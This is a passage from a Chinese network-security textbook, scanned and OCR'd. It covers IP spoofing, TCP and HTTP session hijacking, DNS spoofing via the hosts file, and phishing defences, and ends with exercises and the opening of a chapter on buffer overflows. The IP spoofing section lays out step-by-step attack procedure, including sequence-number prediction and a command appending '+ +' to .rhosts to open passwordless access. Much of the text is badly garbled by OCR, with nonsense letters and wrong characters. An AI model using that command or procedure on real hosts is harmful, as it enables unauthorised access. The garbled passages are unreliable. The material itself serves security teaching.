7.1.2 IP 欺骗 攻击 的 原理 


WRAP A 和 用 户 B 之 间 的 信任 关系 是 基于 IP 地 址 而 建立 起 来 的 , 那 
么 假如 能 够 冒充 用 户 B 的 IP 地址 ,就 可 以 登录 到 用 户 B, 且 无 须 任何 口令 验 
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证 。 这 就 是 IP 期 骗 的 基本 理论 依据 。 

在 实际 场景 中 ,虽然 可 以 通过 编程 的 方法 随意 改变 发 出 的 包 的 IP 地 址 ,但 TCP 协议 对 
IP 地 址 进行 了 进一步 的 封装 , 它 是 I HIER RIN, 

由 于 TCP 是 面 回 连接 的 协议 ,在 双方 正式 传输 数据 之 前 , 需 通 过 “三 次 握手 ”建立 一 个 
稳定 的 连接 。 假 设 主机 A 与 主机 B 两 台 主 机 正在 进行 通信 ,主机 B 首先 发 送 带 有 SYN 标 
志 数 据 段 通知 主机 A 建立 TCP 连接 ,TCP 可 靠 性 是 由 数据 包 中 的 多 位 控制 字 实 现 的 ,其 中 
最 重要 的 是 数据 序列 SYN 和 数据 确认 标志 ACK。 主 机 BR TCP 报头 中 的 SYN 设 为 自身 
本 次 连接 中 的 ISN 初始 值 。 

当主 机 A 收 到 主机 B AIKEN SYN 包 后 ,会 发 送 主 机 B 一 个 带 有 SYN 十 ACK 标志 的 
数据 段 , 告 之 自己 的 ISN, 并 确认 主机 B 发 送 的 第 一 个 数据 段 ,将 ACK 设置 成 主机 B 的 
SYN 十 1。 

当主 机 B 确 认 收 到 主机 A WY SYN+ ACK 数据 包 后 ,将 ACK 设置 成 主机 A 的 SYN 十 1。 
主机 A 收 到 主机 B 的 ACK 后 ,连接 建立 成 功 , 此 时 双方 可 以 正式 传输 数据 了 。 

假如 想 冒 充 主机 B 对 主机 A 进行 攻击 ,就 要 先 使 用 主机 B 的 IP 地 址 发 送 SYN 标志 给 
主机 A ,但 是 当主 机 A 收 到 后 ,并 不 会 把 SYN 十 ACK 发 送 到 攻击 者 的 主机 上 ,而 是 发 送 到 
真正 的 主机 B 上 去 。 但 是 主机 B 根本 没 发 送 SYN 请 求 ,所 以 如 果 要 冒充 主机 B, 首 先 要 使 
主机 B 失去 工作 能 力 ,也 就 是 所 谓 的 拒绝 服务 攻击 , 即 让 主机 BER. 

最 难 的 就 是 对 主机 A 攻击 ,需要 知道 主机 A 所 使 用 的 ISN. TCP 使 用 的 ISN 是 一 个 
32 MANTA ae LAA O~ 4 294 967 295, TCP 为 每 个 连接 选择 一 个 初始 序列 号 ISN ,为 了 
防止 延 开 、 重 传 等 扰乱 三 次 握手 ,ISN 不 能 随便 选取 ,不 同系 统 有 不 同 的 算法 。 理 解 TCP 分 
配 ISN B fe A ISN 随 看 时 间 的 变化 规律 ,是 成 功 进 行 IP 欺骗 攻击 的 重要 步骤 。ISN 大 
约 每 秒 会 增加 128 000, 硅 有 连接 出 现 , 每 次 连接 把 计数 兹 数值 增加 64 000。 这 表示 ISN 的 
32 位 计数 右 在 无 连接 的 情况 下 每 9. 32 小 时 进行 复位 一 次 

之 所 以 采用 这 种 方式 ,是 因为 这 种 实现 方式 有 利于 大 大 减少 “ 旧 有 ”连接 信息 干扰 到 当 
前 连接 机 会 。 奢 初始 序列 号 是 随机 选择 的 , 那 就 不 能 保证 现 有 序列 写 与 之 前 的 序列 号 不 同 。 
假设 一 个 路 由 回路 中 的 数据 包 最 后 跳出 循环 , 回 到 “ 旧 有 ”连接 ,就 会 干扰 现 有 连接 。 预 测 攻 
击 目 标的 序列 号 非常 困难 ,日 不 同系 统 也 不 相同 ,在 Berkeley 系统 中 ,最 初 序列 号 变量 由 某 
— 直到 加 到 这 个 常数 的 1/2 ,开始 一 次 连接 。 

如 果 开 始 一 个 - €— à -个 ISN 正在 使 用 ,就 可 以 进行 预测 ,并 且 有 高 的 
可 信和 度 。 ee 黑客 已 经 使 用 某 种 方法 ,可 以 成 功 预测 ISN。 在 这 种 情况 下 ,可 以 将 
ACK 序列 号 3 送 给 主机 As — T3 


7.1.3 欺骗 攻 击 的 实现 过 程 


IP 欺骗 由 奇 干 步骤 组 成 ,其 详细 步骤 如 下 。 

第 一 步 ,假定 信任 关系 已 被 发 现 。 黑 客 为 进行 IP 欺骗 ,一 般 要 进行 以 下 工作 : 使 被 信 
任 关 系 的 主机 丧失 自己 的 工作 能 力 ,采样 目标 主机 发 出 的 TCP 序列 号 ,进而 猜测 出 其 数据 
序列 号 。 然 后 ,伪装 成 被 信任 主机 ,建立 与 目标 主机 基于 地 址 验证 的 应 用 连接 。 连 接 成 功 
后 ,黑客 可 以 设置 后 门 以 方便 日 后 使 用 。 

第 二 步 ,使 被 信任 主机 失去 工作 能 力 。 为 伪 沪 成 被 信任 主机 而 不 瞪 露 , 需 要 使 其 完全 失 
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去 工作 能 力 。 由 于 攻击 者 将 要 代替 真正 的 被 信任 主机 ,他 必须 确保 真正 被 信任 主机 不 能 收 
到 任何 有 效 的 网 络 数据 ,否则 伪装 将 会 被 揭穿 。 有 许多 方法 可 以 达到 这 个 目的 ,如 SYN iE 
Kkt, TTN, Land 等 。 

第 三 步 , 目 标 主 机 序列 号 的 取样 和 猜测 ,对 目标 主机 进行 攻击 , 需 知 道 目 标 主机 的 数据 
包 序 列 号 。 通 和 常 对 目标 主机 的 序列 号 猪 测 ,往往 先 与 被 攻击 主机 的 一 个 端口 建立 起 正常 连 
接 。 这 个 过 程 重复 N 次 ,并 将 目标 主机 最 后 发 送 的 ISN 存储 起 来 。 然 后 需要 估计 他 的 主机 
与 被 信任 主机 间 的 往返 时 间 ,是 通过 多 次 统计 平均 计算 的 。 往 返 连 接 增加 64 000, 这 时 就 可 
以 佑 计 出 ISN 的 大 小 是 128 000 乘 以 往返 时 间 的 一 半 ,各 此 时 目标 主机 刚 建 立 过 一 个 连接 ， 
就 再 加 上 64 000, 

第 四 步 ,估计 出 ISN 的 大 小 之 后 ,就 开始 实施 攻击 行为 , 当 虚 假 的 TCP 数据 包 进 入 到 
目标 主机 时 , 知 估计 的 序列 号 是 准确 的 ,进入 的 数据 将 被 放置 到 目标 机 的 缓冲 区 中 。 但 在 实 
En AC it; ak FE PEE bh Be ES, an d HAT AY PS) FE WA. RA BUE EE. ATA 
计 的 友 列 号 大 于 正确 值 , 旦 在 缓冲 区 的 大 小 内 ,该 数据 就 被 认为 是 一 个 未 来 数据 ,TCP 模块 
将 会 等 待 其 他 缺少 的 数据 。 硅 估计 的 序列 号 大 于 期 每 的 数字 并 且 不 在 缓冲 区 之 内 ,TCP 将 
会 放弃 它 并 返回 期 望 得 到 的 数据 序列 号 。 

第 五 步 , 伪 朔 成 被 信任 的 主机 IP ,被 信任 的 主机 仍然 出 于 瘫痪 状态 。 人 然后 回 目 标 主 机 
513 端口 发 连接 请 求 , 目 标 主 机 会 立刻 对 请 求 作出 啊 应 ,发 送 更 新 SYN 十 ACK 确认 包 到 被 
信任 主机 ,此 时 被 信任 的 主机 处 于 瘫痪 状态 ,无 法 收 到 此 数据 包 , 随 后 攻击 者 向 目标 主机 发 
ACK 数据 包 ,该 包 使 用 之 前 估计 的 序列 号 加 1] 。 

若 攻 击 者 估计 正确 ,目标 主机 将 接收 该 ACK。 此 时 ,连接 正式 建立 ,可 以 开始 数据 传 
输 。 此 时 ,攻击 者 就 可 以 将 “cat ' 十 十 >> 一 /. rhosts” 命 邻 发 送 过 去 ,完成 本 次 攻击 后 就 可 以 
不 用 口令 卫 接 登 到 目标 主机 上 。 达 到 这 一 步 , 一 次 完整 的 IP ee SEX P. IN A 
已 经 在 目标 主机 上 得 到 了 一 个 Shell, 接 下 来 就 可 以 利用 系统 的 溢出 或 系统 着 洞 扩 大 权限 。 
综 上 所 述 ,IP 攻击 的 整个 步骤 如 下 。 

C1) 使 被 信任 的 主机 网 络 暂 时 处 于 瘫痪 状态 ,防止 对 攻击 形成 干扰 。 

(2) 连接 目标 机 的 某 端口 猜测 出 ISN 值 和 其 增加 规律 。 

(3) 把 源 地 址 伪 半 成 被 信任 主机 ,发 送 珊 SYN 标志 的 数据 段 请 求 连 接 。 

(4) 等 待 目标 机 发 送 SYN+ACK 包 给 已 瘫痪 的 主机 。 

(5) 伪装 成 被 信任 主机 向 目标 主机 发 送 ACK ,此 时 发 送 的 数据 段 需 带 有 预测 的 目标 主 
机 的 ISN 十 1。 


7.1.4 IP 期 骗 对 抗 


在 实际 场景 中 ,安全 从 业 人 员 无 法 预防 IP 欺骗 ,但 是 可 以 通过 一 定 的 手段 对 付 IP 其 
骗 。 对 于 两 个 或 多 个 子 网 的 边界 路 由 器 ,配置 路 由 时 ,阻止 源 地 址 在 管理 域内 ,实际 地 址 在 
管理 域外 的 包 。 边 界 路 由 硕 还 可 以 阻止 源 地 址 是 管理 域外 的 输出 流量 ,此 类 数据 包 表 明 , 子 
网 内 存在 用 户 试 图 使 用 IP 欺骗 发 动 攻击 。 

利用 IP 回溯 也 可 以 对 抗 IP 欺骗 。IP [n] 38] , 即 无 须 依赖 包含 在 伪造 数据 包 中 的 源 IP 地 
址 字段 ,就 能 在 互联 网 上 确定 数据 包 的 实际 来 源 。IP 回溯 可 以 通过 多 种 方法 实现 。 早 期 IP 
回溯 通 过 路 申 需 记录 转发 每 个 数据 包 实 现 , 这 类 方法 虽 容 易 实 现 却 加 大 了 路 由 融 对 空间 的 
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需求 。 另 一 种 较 实 用 的 蔡 代 技术 称 为 数据 包 标 记 , 路 申 硕 用 达到 此 地 时 相关 路 径 的 信息 谁 
确 的 标记 要 转发 的 数据 包 。 当 被 攻击 者 得 到 足够 多 的 数据 包 时 ,能 够 重 构 攻 击 者 路 径 。 其 
实现 方法 可 以 通过 在 路 由 硕 转 发 信息 包 时 将 目 身 路 由 地 址 添加 到 信息 包 尾 部 。 这 样 单 个 数 
据 包 就 可 以 重 构 攻 击 地 址 。 

高 级 的 IP 回 渊 可 以 通过 使 用 IP 数据 包 中 一 个 字段 的 方式 实现 回溯 功能 , 即 节 点 采样 
法 。 对 于 IP 回溯 法 有 众多 理论 研究 成 果 ,但 在 实际 场景 中 却 很 难 实施 , 这 和 许多 厂家 提供 
不 同 功能 的 路 由 硕 有 关 。 了 JP 回 计 是 可 以 抵抗 IP 欺骗 、 解 决 网 络 层 认 证 问题 的 技术 。 


7.2 会 话 劫持 攻击 


7.2.1 会 话 劫持 攻击 的 概念 


会 话 支 持 是 结合 咒 探 与 其 他 欺骗 技术 的 攻击 手段 。 攻 击 者 作为 第 三 方 参与 到 一 次 正 入 
会 话 过 程 中 ,在 会 话 过 程 中 癌 正 常 的 数据 包 中 插入 恶意 数据 ,对 双方 通信 进行 监听 ,甚至 代 
替 革 方 会 话 。 常 见 的 回话 劫持 包括 TCP Sikes. HTTP 会 话 劫持 等 。 

通常 把 会 话 动 持 分 为 两 类 , 即 主 动 动 持 和 被 动 动 持 。 主 动 动 持 是 指 停止 正常 会 话 中 的 
某 一 方 , 攻 击 者 代 蔡 其 完成 会 话 ; 被 动 动 持 是 指 攻 击 者 在 后 台 监 探 双方 会 话 。 


7.2.2 TCP SWF 


TCP 会 话 劫持 , 即 攻击 者 劫持 或 改变 来 自 另 一 个 用 户 的 TCP 连接。 完全 TCP 劫持 会 
话 的 实现 需要 攻击 者 和 目标 用 户 在 同一 网 段 时 进行 。 攻 击 者 可 以 使 用 数据 嗅 探 包 获 得 创建 
会 话 时 数据 包 的 序列 号 。 根 据 已 知 信息 ,攻击 者 问 数 据 包 内 注入 攻击 命令 和 猜测 的 序列 号 ， 
并 使 用 伪造 的 源 TP. 地 址 模拟 客户 端 向 服务 器 发 送 要 注入 的 数据 包 。 

攻击 者 在 完全 会 话 动 持 过 程 中 可 进行 更 加 深入 的 攻击 ,建立 中 间 人 场景 。 建 立 中 间 人 
场景 后 ,攻击 者 可 以 执行 后 继 操 作 , 通 过 伪造 IP 源 地 址 伪装 自身 身份 ,攻击 者 也 可 以 拦截 来 
自 双 方 的 响应 ,其 示意 图 如 7-1 所 示 。 
源 地 址 ，128.220.10.101 
受害 客户 端 a ieee 目的 服务 器 
KÆ: 45 | 














源 地 址 134.22.9.66 
目的 地 址 128.220.10.101 
序列 1052289000 
确认 号 : 18733994045 


134.22.9.66 


128.220.10.101 jtd 
KE: 220 源 地 址 128.220.10.101 
攻击 者 目的 地 址 : 134.22.9.66 

中 间 人 攻击 序列 ，18733994045 


确认 号 : 1052289220 
ABE: 75 


图 7-1 TCP 会 话 劫持 攻击 
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对 于 TCP 回话 支持 攻击 可 以 通过 在 网 络 层 使 用 IPSec 进行 加 密 和 验证 , 除 此 之 外 可 以 
在 应 用 层 使 用 应 用 层 协议 来 加 密 整 个 会 话 。 保 密 要 求 高 的 网 站 应 当 和 避免 使 用 认证 时 校 验 号 
份 ,后 期 通信 时 采用 未 加 密 的 会 话 进行 交流 的 模式 。 
7.2.3 HTTP 会 话 动 持 

Web 浏览 侨 早 已 成 为 用 户 网 上 冲浪 必 不 可 少 的 工具 。 用 户 使 用 浏览 器 进行 操作 时 往 
往 需 要 通过 HTTP 协议 来 实现 通信 。 dc EM th ,攻击 者 可 以 通过 接管 HTTP 会 
话 实 现 其 攻击 意图 。 执 行 HTTP 会 话 劫 持 的 要 求 较 高 ,攻击 者 除了 需要 截获 客户 端 与 Web 
服务 需 间 通信 外 ,还 需要 假冒 受害 机 身份 维持 HTTP 会 话 , 如 图 7-2 所 示 。 








合法 用 户 Joe 
会 话 ID : 7jkLKfIKk390 
会 话 ID 
(用 GET POST X Cookies =J 
RIE) Web 服 务 器 


非法 用 户 Joe( 伪 装 ) | 


会 话 ID : 7jkLKfIk390 S 

iU PER AS dn 

会 话 ID 与 用 户 
信息 的 映射 
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攻击 者 在 实施 HTTP 会 话 支 持 时 ,攻击 者 利用 数据 包 串 探 副 可 以 发 现 受害 者 使 用 会 话 
的 ID。 若 攻击 者 可 以 模仿 在 Cookies 或 GET/POST 变量 中 的 会 话 令 牌 编码 , 则 攻击 者 就 
可 以 成 功 支持 会 话 了 。 

抵抗 HTTP 会 话 盐 持 , 需 要 防止 数据 嗅 探 包 和 TCP 支持 。 除 此 之 外 ,对 服务 器 而 言 可 
以 通过 加 密会 话 令 牌 的 方式 阻止 此 类 攻击 。 为 了 防止 重 放 攻 击 ,建议 在 客户 端 令 牌 和 服务 
器 端 令 牌 中 结合 随机 数 , 经 常 更 换 会 话 令 牌 以 减少 此 类 攻击 。 


7.3 DNS 欺骗 攻击 


7.3.1 DNS 欺骗 攻击 的 概念 

DNS 欺骗 是 攻击 者 冒 元 域名 服务 冀 的 一 种 欺骗 行为 ,也 可 以 看 作 是 网 络 钓 鱼 的 一 种 。 
papakan ——— onka IP ne WA i 
DNS fle ed se 的 主页 REA —— 
访问 而 已 。 
7.3.2 DNS RX UR JA t BJ 5 38 

如 入 可 以 冒充 域名 服务 天 ,然后 把 查询 的 IP 地 址 设 为 攻击 者 的 IP 地 址 ,用 户 上 网 
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只 能 看 到 攻击 痢 的 主页, 而 不 是 用 户 想 要 查询 网 站 的 主页, 这 就 是 DNS 欺骗 的 基本 
原理 。 


7.3.3 DNS 欺骗 攻击 的 实现 过 程 


通过 修改 hosts 文件 实现 DNS HSH. hosts 文件 是 一 个 用 于 存储 计算 机 网 络 中 节点 信 
上 县 的 文件 ,可 以 将 主机 名 映射 到 对 应 的 IP 地 址 ,实现 DNS 的 功能 ,hosts 文件 的 内 容 可 以 由 
计算 机 的 用 户 进 行 控 制 。 

hosts 文件 的 存储 位 置 在 不 同 的 操作 系统 中 不 相同 ,甚至 不 同 Windows 版 本 的 位 置 也 
不 一 样 。 在 Windows NT/2000/XP/2003/Vista/7 中 , hosts 文件 的 默认 位 置 为 % 
SystemRoot% \system32\drivers\etc\, 可 以 对 hosts 文件 的 位 置信 息 进行 修改 。 

许多 网 站 不 经 过 用 户 同 意 将 各 类 插件 安装 到 用 户 的 计算 机 中 ,其 中 有 些 就 是 木马 或 
是 病毒 。 对 于 这 类 网 站 可 以 利用 hosts 文件 把 此 网 站 的 域名 映射 到 错误 的 TP 地 址 或 本 地 
计算 机 的 IP 地 址 中 ,此 方法 可 防止 用 户 访问 此 类 网 站 。 在 Windows XP 系统 中 ,约定 
127. 0.0. 1 是 本 地 计算 机 的 IP 地 址 ,0.0.0.0 是 错误 的 IP thik, GHP hosts 文件 中 与 


127-0. 0-71 + 需 屏 项 的 网 站 A 
0.0.0.0 + 需 屏 蔽 的 网 站 B 


这 样 ,计算 机 解析 域名 A 和 B 时 ,就 会 解析 到 本 机 IP 地 址 或 错误 的 IP 地 址 , 借 此 达到 屏蔽 
网 站 A 和 B 的 目的 。 

因为 域名 劫持 经 常 只 能 在 特定 的 被 劫持 网 络 范 围 进行 ,所 以 此 范围 外 的 域名 服务 器 
(DNS) 能 返回 正 篆 的 了 P 了 地址, 用户 在 网 络 设置 中 把 DNS 指 问 这 些 正 第 域名 服务 器 就 可 以 
正常 访问 网 址 。 因 此 域名 支持 通常 伴随 者 封锁 正常 DNS 的 IP 地 址 。 

右 知 逢 该 域名 真实 的 IP 地 址 ,就 可 以 耳 接 使 用 这 个 IP 地 址 代 蔡 域名 进行 访问 。 例 如 ， 
访问 百度 ,可 以 直接 采用 百度 IP(202. 108. 22. 5) 进 行 访 问 , 即 用 户 将 访问 的 地 址 拦截 下 来 ， 
只 跳 转 到 已 知 主机 上 访问 网 站 。 


7.4 Wf e fa xil 


7.4.1 网 络 钓鱼 攻击 的 概念 


网 络 钓鱼 攻击 者 通过 社工 方法 ,获取 受害 者 的 信息 。 例 如 ,网 络 钓鱼 攻击 者 以 系统 管理 
员 的 身份 ,给 特定 的 用 户 发 送 电子 邮件 ,骗取 他 的 密码 口令 。 一 些 网 络 钓 鱼 攻 击 者 假冒 服务 
机 构 要 求 客户 安装 程序 ,利用 该 程序 劫持 用 户 的 浏览 船 。 最 和 常见 的 网 络 钓鱼 攻击 ,攻击 者 通 
过 创建 一 个 外 观 与 合法 虚拟 网 站 类 似 的 网 站 ,诱骗 用 户 在 虚拟 网 站 上 登录 ,从此 获得 用 户 的 
登录 信息 。 多 数 网 络 钓鱼 攻击 者 的 攻击 目标 以 金融 行业 为 主 , 调 到 的 信息 大 多 是 与 金融 交 
JARAS. 
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7.4.2 URL iÉ ZA 


网 络 钓鱼 者 通过 设置 与 目标 网 站 类 似 的 URL 地 址 诱发 用 户 在 钓鱼 网 站 上 输入 真实 的 
信息 。 攻 击 者 配合 发 送 垃 圾 邮件 ,垃圾 邮件 中 将 合法 链接 修改 为 钓鱼 网 站 的 非法 链接 。 

除 此 之 外 ,URL 混淆 还 存在 一 种 变种 的 Unicode 攻击 。 为 了 支持 网 站 域名 使 用 多 种 语 
A URL 中 使 用 国际 字母 表 中 的 Unicode 字符 。 钓 鱼 者 通过 国际 字符 注册 的 域名 可 能 
与 合法 网 站 的 相似 ,甚至 一 致 。 这 里 有 一 个 钓鱼 网 站 例子 ,使 用 p 注册 域名 ,Cyrullic FFF p 
的 Unicode JJ € 0440, ASCI 字母 的 p 为 站 0070。 当 受害 者 访问 这 个 网 站 时 会 发 现 URL 栏 
中 显示 相同 的 地 址 。 通 过 在 地 址 栏 禁 用 国际 字符 的 方法 可 以 防止 此 类 攻击 。 


7.4.3 ME D v B o 


通过 电子 邮件 服务 防范 网 络 钓鱼 行为 ,电子 邮件 是 网 络 钓鱼 者 施放 攻击 诱饵 的 主要 方 
式 。 切 断 钓 鱼 痢 的 邮件 传播 能 达到 一 定 的 防 汇 效果 。 从 电子 邮件 上 防范 钓鱼 者 攻击 ,可 以 
从 两 个 方面 来 取 措施 。 可 设置 钓鱼 邮件 的 过 滤 网 关 。 人 针对 钓鱼 邮件 特征 ,设置 一 些 邮 件 过 
渡 规 则 ,阻止 钓鱼 邮件 进入 到 用 户 邮 箱 。 在 接收 邮件 服务 冀 计 算 机 上 , 安 站 防 止 钓鱼 邮件 的 
工具 ,如 Mozilla 基金 会 的 Thunderbird。 

在 浏览 右 中 实施 欺骗 行为 是 网 络 钓 鱼 者 梦 县 以 求 的 攻击 方式 ,一 旦 浏览 带 受 控 , 网 络 钓 
鱼 者 就 非常 容 匈 欺骗 用 户 。 和 针对 浏 贤 禹 网 络 钓 鱼 攻 击 , 防 止 钓鱼 攻击 发 生 的 安全 指 施 主要 
为 : 及 时 地 给 训 览 硕 软 件 打 补丁 ,防止 网 络 钓鱼 者 通过 浏览 大 攻击 安 交 恶 意 代 但 ; E Pe DUI 
览 融 保护 软件 ,防止 浏览 硕 漏 洞 攻击 ; 安 猴 浏览 套 防 欺诈 软件 。 例 如 ,互联 网 服务 厂商 
Netcraft BAK SREY AK Netcraft Toolbar, 

提高 个 人 信息 保护 能 力 是 防范 钓鱼 攻击 的 最 主要 手段 。 如 上 所 述 , 网 络 钓鱼 者 最 后 攻 
击 的 对 象 是 个 人 ,其 目标 是 获取 有 价值 的 个 人 信息 。 因 此 ,防止 钓鱼 攻击 上 发生 的 个 人 安全 指 
施主 要 包括 以 下 几 方 面 。 

(1) 保护 个 人 计算 机 安全 ,如 安 闪 杀毒 软件 、 防 钓鱼 工具 。 

(2) 增强 安全 意识 ,如 保护 个 人 口令 安全 ,准确 核对 网 站 地 址 \ 不 随意 点 击 网 络 链接 。 

(3) 电子 交易 时 ,及 时 检查 网 络 交 易 记录 。 

(4) 收取 到 网 上 重要 通知 和 变更 时 ,查看 电子 邮件 来 源 , 或 者 经 电话 核实 。 

针对 网 络 钓鱼 攻击 提出 一 种 基于 流程 阻 断 的 网 络 欺诈 技 术 。 基 于 流程 阻 断 的 网 络 其 诈 
可 通过 对 网 络 欺诈 工 作 流程 进行 分 析 , 发 现 攻击 者 发 出 欺诈 信息 到 攻击 者 获得 私密 信息 整 
个 流程 构成 的 环 路 ,人 然后 通过 对 环 路 中 的 各 种 信息 流 进行 阻 断 , 就 可 以 达到 攻击 者 无 法 成 功 
完成 网 络 其 诈 的 目的 。 


7.5 本 革 小 结 


网 络 钓鱼 是 互联 网 发 展 后 最 新 的 威胁 ,网 络 钓鱼 者 综合 利用 人 性 的 弱点 和 技术 的 漏洞 ， 
然后 达到 攻击 意图 。 本 章 首先 介绍 网 络 钓鱼 攻击 的 概念 和 发 展 趋势 ,分 析 网 络 钓鱼 的 基本 
过 程 ; 其 次 总 结 了 网 络 钓 鱼 常用 的 技术 方法 ; 最 后 给 出 了 防范 钓鱼 攻击 的 技术 方法 和 
工具 
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习题 7 


1. 某 用 户 打 开 浏 览 更 后 发 现 访问 某 网 址 的 页 面 异 常 ,查看 hosts 文件 后 发 现 hosts X 
件 被 修改 ,此 用 户 受 到 了 ( ) 攻 击 。 
A. DNS 欺骗 B. IP 欺骗 C. 网 络 钓鱼 D. Simi 
. ME IP 欺骗 攻击 步骤 。 
. DNS 期 骗 需 要 对 目标 网 站 的 服务 器 进行 攻击 吗 ? 为 什么 ? 
. 防止 网 络 钓鱼 攻击 的 措施 包括 哪些 ? 
. 试 修 改 一 次 本 机 hosts 文件 ,完成 访问 修改 后 的 主机 地 址 。 
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8.1 缓冲 区 次 出 攻击 的 相关 概念 与 发 展 历 程 


8.1.1 绥 冲 区 溢出 攻击 的 相关 概念 


从 程序 的 角度 ,缓冲 区 就 是 应 用 程序 用 来 保存 用 户 输入 数据 程序 临时 
数据 的 内 存 空间 ,其 本 质 是 数组 。 

缓冲 区 汶 出 攻击 是 指 利 用 程序 的 漏洞 ,攻击 者 将 自己 构造 的 攻击 代码 
(shellcode) 植 人 有 缓冲 区 溢出 漏洞 的 程序 执行 体 之 中 ,改变 漏洞 程序 的 执行 
过 程 ,以 获取 目标 系统 的 控制 权 。 如 果 用 户 输入 的 数据 长 度 超出 了 程序 为 其 
分 配 的 内 存 空间 ,这 些 数据 就 会 覆盖 程序 为 其 他 数据 分 配 的 内 存 空 间 ,形成 
所 请 的 缓冲 区 洪 出 。 利 用 缓冲 区 溢出 攻击 ,一 个 Internet 用 户 可 在 匿名 或 拥 
有 一 般 权 限 用 户 的 情况 下 获取 系统 最 高 控制 权 。 近 五 年 中 ,每 年 CERT/CC 
所 公布 的 缓冲 区 澳 出 漏洞 在 当年 的 重大 安全 漏洞 中 都 有 50% VA E RJ EE. H 
远程 网 络 攻 击 中 绝 大 多 数 都 是 缓冲 区 汶 出 攻击 。1998 年 Lincoln 实验 室 用 
来 评估 入 侵 检 测 的 5 种 典型 远程 攻击 方式 中 ,有 3 种 基于 社会 者 工程 学 ,2 种 
fe REX dak tH. Æ Bugtraq 的 调查 中 ,有 2/3 的 被 调查 者 认为 缓冲 区 湾 出 是 
一 个 很 严重 的 安全 问题 。 


8.1.2 缓冲 区 溢出 攻击 类 型 


缓冲 区 溢出 包括 堆栈 溢出 、 堆 溢出 和 基于 Libe E pR žitih o HEPR Ni h 
是 一 种 系统 攻击 手段 ,通过 往 程 序 堆 栈 写 人 超过 其 长 度 的 内 容 造 成 溢出 , 破 
坏 程 序 的 堆栈 ,从 而 使 程序 转 而 执行 其 他 指令 ,达到 攻击 目的 。 堆 栈 洲 出 主 
要 是 由 操作 系统 的 内 存 动态 分 配 机 制 .C 语言 对 边界 缺乏 检查 和 操作 系统 中 
具有 特权 的 系统 程序 引起 的 。 堆 溢出 主要 覆盖 堆 空 间 中 数据 ,如 函数 入 口 地 
址 、 系 统 可 生存 C++ 对 象 .内 存 数 据 等 。 基 于 Libe J eh i it HH AY Dr TE Eh 
回 地 址 用 一 个 Libe 调用 指针 或 其 他 在 固定 位 置 的 尔 数 的 指针 才 盖 挥 ,并 将 
参数 存 人 堆栈 中 。 在 特权 程序 支持 的 过 程 中 ,传统 的 基于 堆栈 的 方法 没有 任 
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何 的 代码 在 堆栈 上 运行 ,而 这 种 方法 不 同 , 它 打破 了 那些 基于 “ 非 可 执行 性 堆栈 和 数据 ”的 方法 。 
8.1.3 缓冲 区 溢出 攻击 的 发 展 历 史 


缓冲 区 溢出 攻击 历史 可 以 追溯 到 20 世纪 80 年 代 初 。1988 年 ,“ 莫 里 斯 蠕虫 ”利用 
finger 中 存在 的 缓冲 区 溢出 感染 了 因特网 中 的 主机 ,一 夜 之 间 导 至 6000 多 人 台 机 融和 被 感染 ， 
直接 经 济 损失 达 9600 万 美元 ,但 是 缓冲 区 洪 出 问题 并 没有 得 到 人 们 的 重视 。1989 Œ, 
Spafford 提交 了 一 份 关 于 运行 在 VAX 机 上 的 BSD 版 UNIX 的 finger 的 缓冲 区 洪 出 程序 的 
对 于 技术 细节 的 分 析 报 告 , 这 引起 部 分 安全 人 士 对 此 研究 领域 的 重视 ,但 此 时 仅 有 少数 人 从 
SOI ,对 于 大 多 数 人 而 言 , 并 没有 太 多 舍 有 学 术 价 值 的 可 用 的 贰 料 。 此 外 ,来 目 墨 客 组 织 
LOpht Heavy Industries 的 Mudge 与 了 一 遍 关 于 如 何 利 用 BSDI 上 的 libc/syslog 中 缓冲 区 

真正 具有 教育 意义 的 种 一 篇 文章 诞生 于 1996 年 ,Aleph One Æ Underground E XJ 
一 篇 论文 详细 描述 了 Linux 系统 中 的 栈 结构 以 及 如 何 利 用 基于 栈 的 缓冲 区 洲 出 。Aleph 
One 还 给 出 了 如 何 编 写 一 个 shell 的 Exploit 的 方法 ,他 给 这 段 代 码 赋 子 的 名 称 shellcode 也 
沿用 人 至今 , 虽 已 部 分 失去 其 原 有 含义 。 我 们 现在 对 这 种 方法 耳 熟 能 评 ,首先 编译 一 段 使 用 系 
统 调 用 的 C 程序 ,然后 通过 调试 融 抽 取 它 的 汇编 代码 ,之 后 根据 需要 修改 这 段 代 码 。 他 给 
出 的 代码 能 在 x86/Linux,SPARC/Solaris 及 Sparc/SunOS 系统 正常 工作 。 

此 后 ,由 于 受到 Aleph One 这 篇 文 草 的 启发 ,Internet 上 靖 现 出 很 多 讲述 组 冲 区 洲 出 的 
利用 方法 及 如 何 写 一 段 所 需 Exploit 的 方法 的 文 草 。1997 年 ,Smith 就 结合 之 前 的 文莉 , 提 
出 了 在 各 种 UNIX 变种 系统 中 写 缓冲 区 溢出 Exploit 的 详细 指导 原则 。 另 外 ,他 还 收集 了 
各 种 处 理事 体系 结构 下 的 shellcode, 其 中 包括 Aleph One 公布 的 AIX 和 HPUX。 他 在 文 
He Ht i Ge Be UNIX 操作 系统 一 些 安全 属性 ,如 SUID 程序 、Linux 的 栈 结构 和 功能 性 等 , 而 
且 讨 论 了 安全 编程 ,还 附带 一 些 有 问题 的 函数 列表 ,也 提供 了 一 些 蔡 代 的 安全 代码 。1998 年 ， 
来 日 黑客 小 组 “Cult of the Dead Cow" RJ Dildog 在 Bugtrq 邮件 列表 之 中 ,以 Microsoft 
Netmeeting 为 例 介 绍 了 利用 Windows 溢出 的 方法 ,此 文章 最 重要 的 贡献 是 提出 利用 栈 指 
针 的 方式 完成 跳 转 ,返回 地 址 指向 固定 地 址 ,无 论 是 在 有 问题 的 程序 中 还 是 在 动态 链接 库 
中 ,这 个 固定 地 址 中 包含 的 汇编 指令 用 来 利用 栈 指针 完成 跳 转 。Dildog 提供 的 方法 能 够 避 
免 因为 进程 .线程 的 区 别 造成 的 栈 位 置 不 国定 。Dildog 的 另外 一 篇 经 典 文章 是 The Tao of 
Windows Buf fer Over flows, 

集大成 者 是 Dark spyrit. 1999 4E {th Ze 2 & Zi as (Phrack 55》 上 提出 利用 系统 的 核心 
DLL 里 的 指令 完成 控制 的 思路 ,将 Windows 下 的 溢出 Exploit 向 前 推进 了 实质 性 的 一 步 。 
同年 ,Litchfield 为 Windows NT 系统 平台 提出 一 个 筒 单 的 shellcode ,详细 讨论 了 Windows 
NT 系统 的 进程 内 存 和 栈 结构 ,以 及 基于 栈 的 缓冲 区 洲 出 ,并 采用 rasman. exe 作为 实例 ,给 
出 了 一 个 提升 权限 创建 本 地 shell 的 汇编 代码 。 同 年 ,w00w00 安全 小 组 的 Conover 写 了 一 
